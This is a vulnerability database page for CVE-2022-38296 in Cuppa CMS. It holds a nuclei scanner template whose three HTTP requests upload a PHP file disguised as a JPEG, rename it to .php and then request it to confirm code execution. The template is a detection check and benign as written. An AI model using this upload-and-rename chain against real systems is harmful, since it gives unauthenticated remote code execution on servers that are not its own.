Lucene search
K

Cuppa CMS v1.0 - Arbitrary File Upload

🗓️ 01 Jul 2026 03:36:47Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 137 Views

Cuppa CMS v1.0 - Arbitrary File Upload vulnerability allows remote code execution and compromise of affected system. Patch or upgrade Cuppa CMS to mitigate

Related
Refs
Code
ReporterTitlePublishedViews
Family
ATTACKERKB
CVE-2022-38296
12 Sep 202221:15
attackerkb
Circl
CVE-2022-38296
13 Sep 202200:25
circl
CNNVD
CuppaCMS 代码问题漏洞
12 Sep 202200:00
cnnvd
CVE
CVE-2022-38296
12 Sep 202220:43
cve
Cvelist
CVE-2022-38296
12 Sep 202220:43
cvelist
NVD
CVE-2022-38296
12 Sep 202221:15
nvd
Prion
Design/Logic Flaw
12 Sep 202221:15
prion
Positive Technologies
PT-2022-24346 · Cuppacms · Cuppacms
12 Sep 202200:00
ptsecurity
RedhatCVE
CVE-2022-38296
9 Jan 202610:56
redhatcve
VulnCheck KEV
VulnCheck KEV: CVE-2022-38296
7 Mar 202600:00
vulncheck_kev
Rows per page
id: CVE-2022-38296

info:
  name: Cuppa CMS v1.0 - Arbitrary File Upload
  author: theamanrawat
  severity: critical
  description: |
    Cuppa CMS v1.0 was discovered to contain an arbitrary file upload vulnerability via the File Manager.
  impact: |
    Successful exploitation of this vulnerability can lead to remote code execution and compromise of the affected system.
  remediation: |
    Apply the latest patch or upgrade to a newer version of Cuppa CMS to mitigate this vulnerability.
  reference:
    - https://github.com/CuppaCMS/CuppaCMS
    - https://nvd.nist.gov/vuln/detail/CVE-2022-38296
    - https://github.com/ARPSyndicate/cvemon
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2022-38296
    cwe-id: CWE-434
    epss-score: 0.0373
    epss-percentile: 0.88454
    cpe: cpe:2.3:a:cuppacms:cuppacms:1.0:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 3
    vendor: cuppacms
    product: cuppacms
  tags: cve,cve2022,rce,cuppa,intrusive,cuppacms,vuln,vkev

http:
  - raw:
      - |
        POST /js/jquery_file_upload/server/php/ HTTP/1.1
        Host: {{Hostname}}
        Content-Type: multipart/form-data; boundary=----WebKitFormBoundary9MZjlIG8fVPjrlCI

        ------WebKitFormBoundary9MZjlIG8fVPjrlCI
        Content-Disposition: form-data; name="path"

        /
        ------WebKitFormBoundary9MZjlIG8fVPjrlCI
        Content-Disposition: form-data; name="unique_name"

        true
        ------WebKitFormBoundary9MZjlIG8fVPjrlCI
        Content-Disposition: form-data; name="resize_width"


        ------WebKitFormBoundary9MZjlIG8fVPjrlCI
        Content-Disposition: form-data; name="resize_height"


        ------WebKitFormBoundary9MZjlIG8fVPjrlCI
        Content-Disposition: form-data; name="crop"


        ------WebKitFormBoundary9MZjlIG8fVPjrlCI
        Content-Disposition: form-data; name="compress"


        ------WebKitFormBoundary9MZjlIG8fVPjrlCI
        Content-Disposition: form-data; name="files[]"; filename="test-{{randstr}}.jpg"
        Content-Type: image/jpeg

        <?php

        echo md5("CVE-2022-38296");

        ?>
        ------WebKitFormBoundary9MZjlIG8fVPjrlCI--
      - |
        POST /js/filemanager/api/index.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {"from":"//{{filename}}","to":"//{{randstr}}.php","action":"rename"}
      - |
        GET /media/{{randstr}}.php HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        part: body_3
        words:
          - ed6bf8b1b4b8e64836455fe32b958c2c
        condition: and

      - type: word
        part: header_3
        words:
          - text/html

      - type: status
        status:
          - 200

    extractors:
      - type: regex
        name: filename
        group: 1
        regex:
          - '"name":"(.*?)",'
        internal: true
# digest: 490a0046304402207c5439d784e395e6213a004821a53dee7333506e917d4e52225cc90f467016ea02205559bcc3f6c235930c8c917a9b84b7067c5b3e097ca40dc43819c62bde170e0b:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
7.4High risk
Vulners AI Score7.4
CVSS 3.19.8
EPSS0.0373
137